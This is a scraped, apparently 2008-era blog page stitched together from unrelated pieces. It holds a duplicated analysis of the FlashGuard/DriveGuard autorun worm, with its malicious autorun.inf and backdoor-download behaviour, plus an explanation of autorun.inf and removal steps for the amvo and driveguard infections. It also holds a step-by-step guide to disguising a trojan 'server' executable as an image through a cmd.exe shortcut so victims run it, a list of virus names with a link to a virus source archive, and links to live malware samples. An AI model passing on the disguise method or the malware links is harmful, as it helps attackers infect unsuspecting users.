techian.com

Drivemonitor.exe flashguard.exe driveguard.exe
all are same..invariants of Win32.Worm.Autoit.AL

The presence of

%programfiles%\FlashGuard\FlashGuard.exe
%windrive%\FlashGuard\ReadMe.txt
%windrive%\FlashGuard\FlashGuard.exe

The presence of autorun.inf on removable drives that contains

[autorun]
open=System\Security\DriveGuard.exe -run
shell\Open=&Open
shell\Open\Command=System\Security\DriveGuard.exe -run
shell\Explore=&Explore
shell\Explore\Command=System\Security\DriveGuard.exe -run

technical description:
This worm tries to impersonate a friendly application one that wants to protect your removable drives from other pieces of malware.

The malicious file would copy itself to %programfiles%\FlashGuard\FlashGuard.exe

It also includes a readme file that reads:
“This tiny software is used to protect removable storage devices from
worms that are spread from one PC to another. ”

It creates the following registry keys:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\FlashGuard
with the value “%windrive%\FlashGuard\FlashGuard.exe” -run

HKCU\Software\Microsoft\Windows\CurrentVersion\Run\FlashGuard
with the value “%windrive%\FlashGuard\FlashGuard.exe” -run

Copies the readme file to %windrive%\FlashGuard\ReadMe.txt

It checks if any of the following processes are running,
iexplore.exe,alg.exe,csrss.exe,cssrs.exe,cssrss.exe,explore.exe,
expIorer.exe,csrss.exe,iexplorer.exe,lexplore.exe,lsass.exe,lssas.exe,
lssass.exe,scshost.exe,scvhost.exe,scvhsot.exe,smss.exe,smsss.exe,
spoolss.exe,spoolsv.exe,spoolvs.exe,ssms.exe,sssms.exe,ssvhost.exe,
svchost.exe,svchsot.exe,serivces.exe,taskmgr.exe,wilnogon.exe,winl0g0n.exe,
winlgoon.exe,winlogno.exe,winlogon.exe,wlnlogon.exe
and if is not one of:
\Program Files\Internet Explorer\iexplore.exe,
\system32\svchost.exe,
\system32\lsass.exe,
\system32\csrss.exe,
\system32\alg.exe,
\system32\winlogon.exe,
\system32\smss.exe,
\system32\spoolsv.exe,
\system32\taskmgr.exe
the process would terminated and the file would get renamed with a “.bak” extension

this worm will remove all files from C:\heap41a that are related to other malicious programs

it enables TaskManager if is disabled

will infect any removable drive writing autorun.inf and a copy of itself
in %drv%\System\Security\DriveGuard.exe with hidden attribute

payload:

will download from http://[removed]/lndexnew.jpg
and http://[removed]/lndexnew.txt
executable files that will be copied to temporary directory with a random name
and reg key HKLM\software\microsoft\windows\currentversion\RunOnce\temp_cleanup
with value “%temp_path%\[random].exe” will be created
All downloaded files are backdoors

Drivemonitor.exe flashguard.exe driveguard.exe
all are same..invariants of Win32.Worm.Autoit.AL

The presence of

%programfiles%\FlashGuard\FlashGuard.exe
%windrive%\FlashGuard\ReadMe.txt
%windrive%\FlashGuard\FlashGuard.exe

The presence of autorun.inf on removable drives that contains

[autorun]
open=System\Security\DriveGuard.exe -run
shell\Open=&Open
shell\Open\Command=System\Security\DriveGuard.exe -run
shell\Explore=&Explore
shell\Explore\Command=System\Security\DriveGuard.exe -run

technical description:
This worm tries to impersonate a friendly application one that wants to protect your removable drives from other pieces of malware.

The malicious file would copy itself to %programfiles%\FlashGuard\FlashGuard.exe

It also includes a readme file that reads:
“This tiny software is used to protect removable storage devices from
worms that are spread from one PC to another. “

It creates the following registry keys:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\FlashGuard
with the value “%windrive%\FlashGuard\FlashGuard.exe” -run

HKCU\Software\Microsoft\Windows\CurrentVersion\Run\FlashGuard
with the value “%windrive%\FlashGuard\FlashGuard.exe” -run

Copies the readme file to %windrive%\FlashGuard\ReadMe.txt

It checks if any of the following processes are running,
iexplore.exe,alg.exe,csrss.exe,cssrs.exe,cssrss.exe,explore.exe,
expIorer.exe,csrss.exe,iexplorer.exe,lexplore.exe,lsass.exe,lssas.exe,
lssass.exe,scshost.exe,scvhost.exe,scvhsot.exe,smss.exe,smsss.exe,
spoolss.exe,spoolsv.exe,spoolvs.exe,ssms.exe,sssms.exe,ssvhost.exe,
svchost.exe,svchsot.exe,serivces.exe,taskmgr.exe,wilnogon.exe,winl0g0n.exe,
winlgoon.exe,winlogno.exe,winlogon.exe,wlnlogon.exe
and if is not one of:
\Program Files\Internet Explorer\iexplore.exe,
\system32\svchost.exe,
\system32\lsass.exe,
\system32\csrss.exe,
\system32\alg.exe,
\system32\winlogon.exe,
\system32\smss.exe,
\system32\spoolsv.exe,
\system32\taskmgr.exe
the process would terminated and the file would get renamed with a “.bak” extension

this worm will remove all files from C:\heap41a that are related to other malicious programs

it enables TaskManager if is disabled

will infect any removable drive writing autorun.inf and a copy of itself
in %drv%\System\Security\DriveGuard.exe with hidden attribute

payload:

will download from http://[removed]/lndexnew.jpg
and http://[removed]/lndexnew.txt
executable files that will be copied to temporary directory with a random name
and reg key HKLM\software\microsoft\windows\currentversion\RunOnce\temp_cleanup
with value “%temp_path%\[random].exe” will be created
All downloaded files are backdoors

Autorun.inf is the primary instruction file associated with the Autorun function. Autorun.inf itself is a simple text-based configuration file that tells the operating system which executable to start, which icon to use, and which additional menu commands to make available. In other words, autorun.inf tells Windows how to deal open the presentation and treat the contents of the CD.

The entire sequence is initiated when the “disk change notifcation” polling discovers a new disk in the CD or DVD ROM drive. Then, if the “Auto insert notification” feature is enabled (it is by default), Windows checks in the new disk’s root directory for the existence of an “autorun.inf” file. If found, Windows then reads and follows the specific instructions this file defines. If no autorun.inf file is found, then Windows refers to the new disk by its serial number and executes the default actions associated with the (data or audio) content on the disk.

The Autorun.inf file defines the following:
Autorun.inf Defines the following: The process or application that will automatically run when a disk is inserted
Automatically run when CD is inserted Optionally, one can define the process or application that will run for specific Operating environments.
Icon Representing CD or DVD The icon that will represent your application’s CD or DVD when the drive is viewed with My Computer or Explorer.
Menu Commands when CD-ROM is clicked Menu commands displayed when the user right-clicks the CD-ROM icon from My Computer or Explorer.

A simple Autorun.inf example:
[autorun]
open=autorun.exe
icon=autorun.ico

so in this way it may be used to call malicious file too, so beware.

Avispa.dr
Dark Avenger
AVA.550
Univ/a
Auspar.377
Auspar.338
OC/oops
Middle
Auspar.635
Aus-Term.mp.3490
Jeru.1413
OC/scud
Auspar.dr
Auspar.635
Auspar.615
Auspar
Aust.543
Auspar.424
Auspar.377
Auspar.338
Auspar.292a
Auspar.215
Auspar.187
Auspar
Univ/b
Aurea.653
Iron-Maiden
Akuku.1111
Akuku.889
Akuku.886
NRLG.b
Attitude
Attention.394
HLL.ow.4505
Attention.394.dam
Xany
Univ/g
Univ/q
Univ.cmp
OC/vcl
Atomant.2143
AT
Atomic.350
Astra.1010
Suriv.dr
Comasp
Shocker.cmp.7000
Tiebud
BtDr.b
Ash.743
Univ/r
Armagedon.y
Armagedon
Vienna
ARCV.Scy.1208
ARCV.Scroll.795ARCV.Scroll.dr)
ARCV.Sand.1172
ARCV.More
ARCV.Kiss
ARCV.Jo.986
ARCV.Jo.912a
ARCV.250.dr
ARCV.642
ARCV.639a
ARCV.1183.dr
ARCV.Anna.742.dr
ARCV.639a
ARCV.Jo.916
ARCV.839
ARCV.Slime.773
ARCV.Ice
ARCV.Ice
Univ/q
ARCV.330a
ARCV.255
Crew.2480
Univ/o
7thSon.426
Arara.dr
Arara.1054
Arab.834
Armagedon.y
QScreen3
Suriv.1488
Suriv.dr
Dark Avenger.2000
Jerusalem.cr
Jerusalem.cr
APLittle.153
APLittle.150
APLittle.147
APLittle.142a
APLittle.118a
APLittle.153
Univ.topsy
Anti-Pascal
Tiny-GM.129
Jerusalem
BtDr.Unk2
Jeru.1605
AntiMIT
Antiexe
Murphy
Thanksgiving.mp.1253a
Anticad.3012a
Anticad.mp.4096.d
Anticad.2900
Anticad.mp.4096.a
Anticad.2646
Anthrax.mp.1024
Univ.ow/d
Vacsina.1206
ARCV.Anna.742.dr
HLLP.Animus
Andromeda
Jerusalem.ch
Jeru.1808.a
QZap141
Pixel.845
Pixel.k
Ambulance
AlphaStrike.2000
Alien.733.a
Alia.1023
YD.1049.a
Alex.1951
Brain
Albania
Alabama.1560.a
Akuku.886
Tiebud
BtDr.Aircop
BtDr.b
HLL.ow
HLL.cmp.8064
AHADisk
Agiplan
YDOC/vcl
Syslock.dropped
NRLG.b
V2P6.1993
Dead
BitAddict
ARCV.Scroll.795
ARCV.Scroll.dr
Acid.dr
And Many More ……..
Download Link :

http://rapidshare.com/files/82708010/Virus_Source.zip

This may be helpful for some people
1. Firstly, create a new folder and make sure that the options ‘show hidden files’ is checked and ‘hide extensions for known file types’ is unchecked. Basically what u need is to see hidden files and see the extension of all your files on your pc.

2. Paste a copy of your server on the new created folder. let’s say it’s called server.exe (that’s why you need the extension of files showing, cause you need to see it to change it)

3. Now you’re going to rename this server.exe to whatever you want, let’s say for example picture.jpeg

4. Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES.

5. Now create a shortcut of this picture.jpeg in the same folder.

6. Now that you have a shortcut, rename it to whatever you want, for example, me.jpeg.

7. Go to properties (on file me.jpeg) and now you need to do some changes there.

8. First of all delete all the text on field START IN and leave it empty.

9. Then on field TARGET you need to write the path to open the other file (the server renamed picture.jpeg) so u have to write this: C:\WINDOWS\system32\cmd.exe /c picture.jpeg

10. The last field, c picture.jpeg is always the name of the first file. If you called the first file soccer.avi you gotta write C:\WINDOWS\system32\cmd.exe /c soccer.avi got it?

11. So what you’re doing is when someone clicks on me.jpeg, a cmd will execute the other file picture.jpeg and the server will run.

12. On that file me.jpeg (shortcut), go to properties and you have an option to change the icon. click that and a new window will pop up and u have to write this: %SystemRoot%\system32\SHELL32.dll . Then press OK.

13. You can set the properties HIDDEN for the first file (picture.jpeg) if you think it’s better to get a connection from someone.

14. But don’t forget one thing, these 2 files must always be together in the same folder and to get connected to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want considering the person and the knowledge they have on this matter.

vx.netlux.org/vl .php
this site is also know as virus heaven
around 4gb of readymade viruses

http:// www.totallygeek.com/vscdb/[
this site is virus source code database
many are in assembly language and many are in c / vb etc

amvo

removal methods

Amvo virus attacks Yahoo! messenger,
It consists of 3 files,
windows\system32\amvo.exe
windows\system32\amvo1.dll
windows\system32\amvo0.dll

just delete these 3 files and the virus is gone, and donot forget to remove the startup entry for amvo.exe, either from msconfig or regedit or any 3rd party tool

1. Open Task Manager
2. End Task Explorer.exe
3. Select Run from File Menu
4. Type cmd (press enter)
5. In Command Prompt Type: cd %windir%\system32
6. Type: attrib -s -h -r amvo*.*
7. Type del amvo*.*
8. Remove startup entries and virus is gone

http://mtaram.wordpress.com/2008/01/03/computer-troubleshooting-virus-issues/

Posted on January 3, 2008 by mtaram

Recently I had a big time trouble with my computer as all the drives failed to open on double clicking and showed me a application selection window instead. After searching through the running processes and other settings I found that the show hidden files options in the folder options was also not working.

With the help of one of my friends [MOHIT] I fixed the issues.

The problem was due to amvo.exe amvo0.dll ampo.exe amvol.dll xfoolavp.com usdeiect.com and autorun.inf present in every drive’s root.

The fix works as follows…

open task manager (if ur task manager doesnt open and shows errors and warnings then use this tool
http://www.brothersoft.com/rrt-(remove-restrictions-tool)-60879.html
and end task the above mentioned processes if u see them in the running process list from the processes pane. Then goto applications pane and click on new task and type in cmd or command. Once at the command prompt type in “cd\” without the quotes to goto the root of the current drive. Then type “del /f /a /s /q”

where of the files above mentioned (this menthod can also be used to force delete any unwanted file ) use this method to delete all above mentioned from the root of every drive.

After this open registry editor by clicking on new task and typing in “regedit” without quotes. Then goto HKCU > software >microsoft >windows >current version > explorer > advanced > then look for the hidden key in the right pane and change the value to 1 from 2.

And to fix the issues with drives not opening or search opening up on double click download this .reg
http://megamachine.infinites.net/open.reg
(right click and save target as) file and double click it and add to your registry.

or do this…

copy every under this line paste in notepad save with .reg extension on ur desktop and double click it

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\Directory\shell]
@=”Open”
[HKEY_CLASSES_ROOT\Directory\shell\Explo

Removal of Driveguard.exe virus is very easy. just open taskmanager and end the process driveguard.exe and also of any .tmp extension is running then also end that process. Now remove its entry from startup by going to msconfig. also dont forget to del your temp files.

How i found it:
Today one of my frnd came to me for some files from my system.. he inserted his pen drive and clicked here ..there… result: pc got infected

i found the process driveguard . exe in task manager

it was trying to access site
http://www.freewebs.com/microsotf/
and download some Update-KB684903-x86. exe file..
http://rapidshare.com/files/127625927/Update-KB684903-x86.rar.html

which was detected by nod as a trojan

the site is still alive as the admins of freewebs are damn lazy to take actions

download link for driveguard file
http://rapidshare.com/files/127625326/WinDriveGuard.rar.html

read the text file.. it claims it to be “spyware removal tool”